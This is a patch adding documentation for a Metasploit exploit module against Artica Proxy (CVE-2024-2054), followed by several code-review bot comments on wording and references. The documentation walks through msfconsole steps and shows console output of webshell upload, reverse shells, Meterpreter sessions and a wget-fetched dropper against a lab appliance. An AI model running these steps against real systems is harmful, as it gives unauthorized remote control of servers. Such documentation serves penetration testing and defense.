From 5dd75e174b42cf6fb49dff30d79250ec8a38418d Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Fri, 15 Mar 2024 18:27:59 +0000 Subject: [PATCH] second release module and documentation --- .../artica_proxy_unauth_rce_cve_2024_2054.md | 209 ++++++++++++++++++ .../artica_proxy_unauth_rce_cve_2024_2054.rb | 4 +- 2 files changed, 211 insertions(+), 2 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md new file mode 100644 index 0000000000..7f1bfc71e9 --- /dev/null +++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md 
@@ -0,0 +1,209 @@ +## Vulnerable Application + +A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers +to run arbitrary commands via unauthenticated HTTP request. +The Artica Proxy administrative web application will de-serialize arbitrary PHP objects +supplied by unauthenticated users and subsequently enable code execution as the `www-data` user. + +## Installation steps to install Artica Proxy appliance +* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. +* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). +* Download the Artica Proxy iso image from [here](https://sourceforge.net/projects/artica-squid/files/ISO/). +* Install the iso image in your virtualization engine. +* When installed, configure the VM appliance to your needs using the menu options. +* Boot up the VM and should be able to access the Artica appliance. +* Either thru the console, `ssh` on port `22` or via the `webui` via `https://your_articaproxy_ip:9000`. + +You are now ready to test the module. + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054` +- [ ] `set rhosts ` +- [ ] `set rport ` +- [ ] `set webshell cuckoo` +- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>` +- [ ] `exploit` +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings + +## Options + +### WEBSHELL +You can use this option to set the filename without extension of the webshell. +This is handy if you want to test the webshell upload and execution with different file names. +to bypass any security settings on the Web and PHP server. + +### COMMAND +This option provides the user to choose the PHP underlying shell command function to be used for execution. 
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`. +This option is only available when the target selected is either Unix Command or Linux Dropper. +For the native PHP target, by default the `eval()` function will be used for native PHP code execution. + +## Scenarios + +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info + + Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability + Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054 + Platform: PHP, Unix, Linux + Arch: php, cmd, x64, x86 + Privileged: No + License: Metasploit Framework License (BSD) + Rank: Excellent + Disclosed: 2024-03-05 + +Provided by: + h00die-gr3y + Jaggar Henry of KoreLogic Inc. + +Module side effects: + ioc-in-logs + artifacts-on-disk + +Module stability: + crash-safe + +Module reliability: + repeatable-session + +Available targets: + Id Name + -- ---- + => 0 PHP + 1 Unix Command + 2 Linux Dropper + +Check supported: + Yes + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba + sics/using-metasploit.html + RPORT 9000 yes The target port (TCP) + SSL true no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI / yes The Artica Proxy endpoint URL + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + WEBSHELL no Set webshell name without extension. Name will be randomly generated if left un + set. 
+ + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t + he local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 1981 yes The local port to listen on. + + + When TARGET is not 0: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec) + +Payload information: + +Description: + A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows + remote attackers to run arbitrary commands via unauthenticated HTTP request. + The Artica Proxy administrative web application will deserialize arbitrary PHP objects + supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + +References: + https://nvd.nist.gov/vuln/detail/CVE-2024-2054 + https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054 + https://packetstormsecurity.com/files/177482 + + +View the full module info with the info -d command. +``` + +### Target 0 - PHP native `php/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo +webshell => cuckoo +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0 +target => 0 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4 +rhosts => 192.168.201.4 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8 +lhost => 192.168.201.8 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. 
+[+] The target is vulnerable. Artica version: 4.50 +[*] Executing PHP for php/meterpreter/reverse_tcp +[*] Sending stage (39927 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000 + +meterpreter > sysinfo +Computer : artica-applianc +OS : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 +Meterpreter : php/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` +### Target 1 - Unix Command `cmd/unix/reverse_bash` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1 +target => 1 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing Unix Command for cmd/unix/reverse_bash +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000 + +uname -a +Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux +id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` +### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2 +target => 2 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. 
Artica version: 4.50 +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp +[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo +[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo +[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000 +[*] Command Stager progress - 100.00% done (119/119 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : artica-applianc.domain.tld +OS : Debian 10.13 (Linux 4.19.0-24-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` + +## Limitations +No limitations. diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb index bfb96b85ea..3a54dd70ed 100644 --- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2024-2054'], - ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'], + ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'], ['PACKETSTORM', '177482'] ], 'DisclosureDate' => '2024-03-05', 
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote ) register_options([ OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]), - OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]), + OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]), OptEnum.new('COMMAND', [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0]) ])
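Review bot: In the new documentation hunk, the module path under "Verification Steps" has a doubled slash (`use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054`), which does not match the module path shown in the `info` output further down and will not resolve as written; drop the extra `/`. Two prose nits in the same file: the WEBSHELL option section ends in a dangling fragment ("...with different file names. to bypass any security settings on the Web and PHP server.") that should be joined to the preceding sentence, and the installation step "Boot up the VM and should be able to access the Artica appliance" is missing its subject ("and you should be able to..."; likewise "thru" -> "through"). The opening paragraph also calls the bug a "Command Injection vulnerability" while the module's own name in the `info` block is "Unauthenticated PHP Deserialization Vulnerability"; leading with the deserialization wording and then describing the resulting command execution would keep the two consistent. Finally, the "Limitations" section reads "No limitations." even though the scenario output shows every session running as `www-data` and the dropper target needs the target to reach back to `SRVHOST:SRVPORT` over HTTP; both are worth stating there.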
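Review bot: The `@@ -29,7 +29,7 @@` hunk replaces the `xxxxx` placeholder in the AttackerKB reference with the real topic id `q1JUcEJjXZ`, which now agrees with the URL listed in the documentation's `References` block; this is the right fix, but a placeholder reference shipping in the first release suggests a pre-merge check for `xxxxx`-style values in `'References'` would be worthwhile. Metasploit's reference table also has an `AKB` type that expands to `https://attackerkb.com/topics/<id>`, so `['AKB', 'q1JUcEJjXZ']` is the shorter form consistent with the neighbouring `['PACKETSTORM', '177482']` entry, if you prefer the typed references over a raw `URL`.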
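Review bot: In the `@@ -87,7 +87,7 @@` hunk the new WEBSHELL description starts with "Set webshell name ...", but the `set` verb is already implied by how every option is assigned, and the other descriptions in the same `register_options` block (e.g. `'The Artica Proxy endpoint URL'`) are noun phrases; the previous wording "Web shell name without extension. Name will be randomly generated if left unset." was closer to that convention, so I would keep it rather than introduce the imperative form. Unrelated to this change but visible in the context lines: the `TARGETURI` option uses padded brackets (`[ true, ..., '/' ]`) while `WEBSHELL` and `COMMAND` do not, and the explicit `nil` default on `WEBSHELL` is redundant for an optional `OptString`; both are trivial to tidy in the same hunk.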